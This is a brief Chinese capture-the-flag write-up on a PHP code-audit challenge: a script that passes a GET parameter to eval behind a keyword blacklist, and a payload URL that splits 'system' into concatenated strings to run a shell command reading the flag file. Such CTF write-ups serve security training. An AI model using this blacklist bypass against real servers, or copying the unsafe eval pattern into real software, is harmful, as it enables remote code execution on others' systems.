代码审计
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
过滤 system,还是很简单
用php的动态函数就行了
payload:
http://48c7fde3-1b06-422b-915d-25a32125fb8c.challenge.ctf.show/?c=$s="syste"."m";$s("cat fla?.ph?");